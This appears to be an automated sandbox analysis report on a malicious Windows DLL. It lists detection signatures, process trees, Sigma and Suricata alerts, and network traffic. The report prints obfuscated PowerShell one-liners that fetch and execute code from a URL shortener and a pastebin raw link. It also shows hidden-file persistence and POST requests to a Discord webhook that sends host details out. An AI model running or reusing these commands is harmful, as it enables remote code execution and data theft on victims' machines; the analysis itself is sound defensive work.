Windows Analysis Report
HQsitBLlOv.dll

Overview

General Information

Sample name: HQsitBLlOv.dll
(file extension renamed from exe to dll; the file was renamed because the original name is a hash value)
Original sample name: 2577c0f08d1d1ad4fb18d8c980b501e002160acffa306b2d8ab1af8614521ac4.exe
Analysis ID: 1534112
MD5: 285e7d2f11c30f89d10887eef102cd74
SHA1: ce53d9b363bfc3baff51b690f37be27853053fcc
SHA256: 2577c0f08d1d1ad4fb18d8c980b501e002160acffa306b2d8ab1af8614521ac4
Tags: exeNeth3Nuser-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Obfuscated command line found
Powershell creates an autostart link
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to open files direct via NTFS file id
Uses cmd line tools excessively to alter registry or file data
Connects to a URL shortener service
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sigma detected: CurrentVersion Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • loaddll64.exe (PID: 4576 cmdline: loaddll64.exe "C:\Users\user\Desktop\HQsitBLlOv.dll" MD5: 763455F9DCB24DFEECC2B9D9F8D46D52)
    • conhost.exe (PID: 1220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6752 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HQsitBLlOv.dll",#1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • rundll32.exe (PID: 3976 cmdline: rundll32.exe "C:\Users\user\Desktop\HQsitBLlOv.dll",#1 MD5: EF3179D498793BF4234F708D3BE28633)
        • powershell.exe (PID: 4040 cmdline: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 4044 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • regsvr32.exe (PID: 1468 cmdline: regsvr32.exe /s C:\Users\user\Desktop\HQsitBLlOv.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
      • powershell.exe (PID: 2992 cmdline: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 2612 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • rundll32.exe (PID: 5500 cmdline: rundll32.exe C:\Users\user\Desktop\HQsitBLlOv.dll,DllRegisterServer MD5: EF3179D498793BF4234F708D3BE28633)
      • powershell.exe (PID: 2536 cmdline: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 2524 cmdline: "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
    • powershell.exe (PID: 1396 cmdline: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 1292 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6744 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 2248 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • forfiles.exe (PID: 2188 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 3928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1112 cmdline: -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 3780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 2536 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Process Memory Space: powershell.exe PID: 4040 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Process Memory Space: powershell.exe PID: 2992 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Process Memory Space: powershell.exe PID: 1396 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Process Memory Space: powershell.exe PID: 2248 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
Source | Rule | Description | Author | Strings
amsi64_2536.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
amsi64_4040.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
amsi64_2992.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
amsi64_1396.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
amsi64_2248.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen

System Summary

Source: Process started | Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\HQsitBLlOv.dll, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 1468, ParentProcessName: regsvr32.exe, ProcessCommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), ProcessId: 2992, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\HQsitBLlOv.dll,DllRegisterServer, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5500, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), ProcessId: 2536, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4040, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive File Sync
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\HQsitBLlOv.dll,DllRegisterServer, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 5500, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing), ProcessId: 2536, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-15T16:00:15.804529+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.6 | 49832 | 162.159.136.232 | 443 | TCP
2024-10-15T16:00:25.665151+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.6 | 49888 | 162.159.136.232 | 443 | TCP
2024-10-15T16:00:25.701967+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.6 | 49890 | 162.159.136.232 | 443 | TCP
2024-10-15T16:00:25.715450+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.6 | 49889 | 162.159.136.232 | 443 | TCP
2024-10-15T16:00:41.031749+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.6 | 49971 | 162.159.136.232 | 443 | TCP
2024-10-15T16:00:48.382072+0200 | 2857659 | 1 | A Network Trojan was detected | 192.168.2.6 | 50012 | 162.159.136.232 | 443 | TCP

AV Detection

Source: HQsitBLlOv.dll | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 94.5% probability
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:49750 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49763 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49832 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49885 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49888 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49890 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49889 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49898 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49932 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.6:49944 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49971 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:50012 version: TLS 1.2
Source: HQsitBLlOv.dll | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb | source: HQsitBLlOv.dll

Networking

Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.6:49832 -> 162.159.136.232:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.6:49888 -> 162.159.136.232:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.6:49890 -> 162.159.136.232:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.6:49889 -> 162.159.136.232:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.6:49971 -> 162.159.136.232:443
Source: Network traffic | Suricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.6:50012 -> 162.159.136.232:443
Source: unknown | DNS query: name: pastebin.com (observed 2x)
Source: unknown | DNS query: name: tinyurl.com (observed 2x)
Source: Joe Sandbox View | IP Address: 162.159.136.232
Source: Joe Sandbox View | IP Address: 104.20.4.235 (observed 2x)
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS (observed 2x)
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected (observed 16x): GET /raw/sA04Mwk2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: pastebin.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (observed 24x): GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (observed 6x): POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 299 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (observed 8x): GET /yeykydun HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: tinyurl.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (observed 5x)
Source: global traffic | DNS traffic detected: DNS query: tinyurl.com
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: discord.com
Source: unknown | HTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Content-Type: application/json | Host: discord.com | Content-Length: 299 | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 14:00:15 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729000817 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jff%2FeMVO2KG17lc8vGu0fRk5DWy%2FjJU23fOMhXWfuWEM2og69ON5FdHTrRS%2F7lRPnuRdrtajEZQeGicHz9%2B2WpVkcWUXDmioWOAUEcdAeldMhKptrUUT%2Bujk1d7U"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=69e39aecfecfdac47cfdc161cc57c10f88539518-1729000815; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=Ho1f9XAeszMYfSRJmyoAWCg.9y_pkJ1rIfYEaAZhERE-1729000815740-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d305599ab2f478d-DFW
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 14:00:25 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729000826 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vWF2vJvMk0W8tny4KPx5%2B9OdLNhXvCQpJMC31ZbJju5XziaPQeLWMs6YUqt2fN03SJf9HMVpAmjOljD7MlqjgkWCFbR4cVtNG%2BTS3Vm4dMBuVU3h2a%2Fv4NP4MJvk"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=050eb5be000dd04550d85db9e7fbbd1aef63545d-1729000825; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=TT0GGYcYwONH2Rv7OtXW9F2ggNPn0x86vCodexDNci4-1729000825599-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d3055d76861e5b5-DFW
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 14:00:25 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 3 | x-ratelimit-reset: 1729000827 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6pCd9sAtAPFvL8TMzqi70eNOKIel4ISsUHchNj2P6Y%2BEwwpTZ3vGIiPmxlPvlXB8zWYsD%2FHJqj7RTwoTBrv2nEoi3MDo5aeCTSs6P59Nij18zK6dsSAt9bFJBQVQ"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=050eb5be000dd04550d85db9e7fbbd1aef63545d-1729000825; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=mZqAcWGFCoWOO36NRcRqxgiI4Kd08HYF3S1w_qbNPhI-1729000825638-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d3055d79a22474e-DFW
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 14:00:25 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 2 | x-ratelimit-reset: 1729000827 | x-ratelimit-reset-after: 2 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a%2FjNmdU17uOHYJHxxD7YUtZMp%2Fq1c0fR3XnWVHXpdwkkKjV%2BPlWgmKwHgoqMhIp%2BMQfGfRobQAf9S7O4Ktnj0CgoslX52T%2FbjqwpbJ3S6PPAlgbdlRcL0668qfIl"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=050eb5be000dd04550d85db9e7fbbd1aef63545d-1729000825; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=QyY4bEJrOjzhqaN.da..q9PGkGXCVz9.TBkJo9a77QI-1729000825651-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d3055d7ac80346e-DFW
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 14:00:40 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729000842 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ykgrJhrdQAuXIF%2FQKSeE60CJ37pvq8%2Bc5vmP6qWBgJ93tUd3Qeejir6C8t2jVEUmYaLY6XNSD48senElWeEarjuzGLieg2WRFr8Fxn0KluQiH6wzX9lRMMTH0zmt"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=2ea9685ce586c51b0bca2e633e8796cf617bbecc-1729000840; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=eCs98e8dAlxe0U1ShJkr5nbDFUYVwumZQuMHhZ8z4IA-1729000840964-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d3056374bf86900-DFW
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 15 Oct 2024 14:00:48 GMT | Content-Type: application/json | Content-Length: 45 | Connection: close | Cache-Control: public, max-age=3600, s-maxage=3600 | strict-transport-security: max-age=31536000; includeSubDomains; preload | x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f | x-ratelimit-limit: 5 | x-ratelimit-remaining: 4 | x-ratelimit-reset: 1729000849 | x-ratelimit-reset-after: 1 | via: 1.1 google | alt-svc: h3=":443"; ma=86400 | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MpGZhnGytTbBzZ%2BcgkX91TRStmAqOqXKjT%2B4jB6yA%2BdlxoO%2B9st0%2F2KXqIql7L%2FLeppQTltStmbM3Wb2el9wWCKsucMJptU37J5gmQIGd3om9sRfkTM4G4n6YV%2F3"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | X-Content-Type-Options: nosniff | Set-Cookie: __cfruid=26fb985b43ebf471a437580369e1a2bbe44f8557-1729000848; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Content-Security-Policy: frame-ancestors 'none'; default-src 'none' | Set-Cookie: _cfuvid=L72acNRxEN0zEuoWczc9wPsvJRIRmfHA8n91nvmo6jE-1729000848317-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None | Server: cloudflare | CF-RAY: 8d305665596e4746-DFW
